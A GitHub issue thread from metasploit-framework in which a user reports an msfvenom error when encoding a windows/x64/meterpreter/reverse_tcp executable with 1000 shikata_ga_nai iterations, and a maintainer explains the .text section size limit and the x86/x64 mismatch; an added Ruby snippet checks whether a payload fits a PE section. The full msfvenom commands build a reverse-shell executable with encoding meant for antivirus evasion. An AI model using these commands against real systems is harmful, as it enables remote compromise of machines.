metasploit-framework
Msfvenom No section contains RVA
Hello
I have a problem / a question: why, when I encode a payload, do I get this error: No section contains RVA
I get this error when I encode with a large number of iterations, for example:
msfvenom -p windows/x64/meterpreter/reverse_tcp --format exe-only --encoder x86/shikata_ga_nai --iterations 1 --arch x64 --out BugExemple.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 537 (iteration=0)
x86/shikata_ga_nai chosen with final size 537
Payload size: 537 bytes
Final size of exe-only file: 6144 bytes
Saved as: BugExemple.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp --format exe-only --encoder x86/shikata_ga_nai --iterations 1000 --arch x64 --out BugExemple.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1000 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 537 (iteration=0)
x86/shikata_ga_nai succeeded with size 564 (iteration=1)
.........
x86/shikata_ga_nai succeeded with size 29414 (iteration=997)
x86/shikata_ga_nai succeeded with size 29443 (iteration=998)
x86/shikata_ga_nai succeeded with size 29472 (iteration=999)
x86/shikata_ga_nai chosen with final size 29472
Error: No section contains RVA
It does that with every payload
Pretty sure that one issue is that the payload is so large due to being encoded 1000 times that this line below causes addressOfEntryPoint to be negative.
https://github.com/rapid7/metasploit-framework/blob/2f1949d02101e17cbdf62dfc2ff1aeaccdc9fc62/lib/msf/util/exe.rb#L420
It doesn't look like the code currently supports resizing the .text section so any payload that won't fit in there can't be generated. You could specify your own executable template with a .text section that is of a sufficient size. The method should probably throw an exception if the payload won't fit in the .text section (i.e. sizeOfRawData < code.length).
Having said that, even if you did that and we detected the error condition and reported it correctly, your payload wouldn't work because you're encoding an x64 payload with an x86 encoder.
As a side note, if you're hoping that encoding the payload 1000 times will help it evade anti-virus, it would be dependent on the AV but in general, it's unlikely.
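The size check suggested in the reply above, as an added example that is not part of the original thread and not Metasploit's own code: it reads the section table of a PE image and raises a descriptive error when the code would not fit in the section holding the entry point. All method names are hypothetical, and the 4096-byte .text section is a constructed sample, not the size of the real template; 537 and 29472 are the payload sizes from the output above.

```ruby
# Added example, not Metasploit code; all names are hypothetical.
Section = Struct.new(:name, :vaddr, :vsize, :raw_size)
class PayloadTooLarge < StandardError; end

# Read the entry point RVA and the section table from a PE image.
def parse_pe(image)
  raise ArgumentError, 'not an MZ image' unless image.byteslice(0, 2) == 'MZ'
  pe = image.byteslice(0x3c, 4).unpack1('V')            # e_lfanew
  raise ArgumentError, 'no PE signature' unless image.byteslice(pe, 4) == "PE\0\0"
  count = image.byteslice(pe + 6, 2).unpack1('v')       # NumberOfSections
  opt_size = image.byteslice(pe + 20, 2).unpack1('v')   # SizeOfOptionalHeader
  opt = pe + 24
  entry = image.byteslice(opt + 16, 4).unpack1('V')     # AddressOfEntryPoint
  sections = Array.new(count) do |i|
    name, vsize, vaddr, raw = image.byteslice(opt + opt_size + i * 40, 20).unpack('a8VVV')
    Section.new(name.delete("\0"), vaddr, vsize, raw)
  end
  [entry, sections]
end

# Raise a descriptive error instead of letting an oversized payload through.
def check_payload_fits(image, code_length)
  entry, sections = parse_pe(image)
  sec = sections.find do |s|
    (s.vaddr...(s.vaddr + [s.vsize, s.raw_size].max)).cover?(entry)
  end
  raise PayloadTooLarge, format('no section contains entry RVA 0x%x', entry) unless sec
  if sec.raw_size < code_length   # the sizeOfRawData < code.length condition
    raise PayloadTooLarge, "#{code_length} bytes do not fit in #{sec.name} (#{sec.raw_size} raw bytes)"
  end
  sec
end

# Constructed minimal PE32+ header with one .text section (sample input).
def sample_pe(text_raw_size: 0x1000, entry_rva: 0x1000)
  dos = 'MZ'.b.ljust(0x3c, "\0") + [0x40].pack('V')
  coff = [0x8664, 1, 0, 0, 0, 0xf0, 0x22].pack('vvVVVvv')
  opt = [0x20b, 0, 0, 0, 0, 0, entry_rva].pack('vCCVVVV').ljust(0xf0, "\0")
  text = ['.text', 0x1000, 0x1000, text_raw_size, 0x400].pack('a8VVVV').ljust(40, "\0")
  dos + "PE\0\0" + coff + opt + text
end
```

With the constructed template, a 537-byte payload passes and a 29472-byte payload raises `PayloadTooLarge` with the section name and sizes in the message.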
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.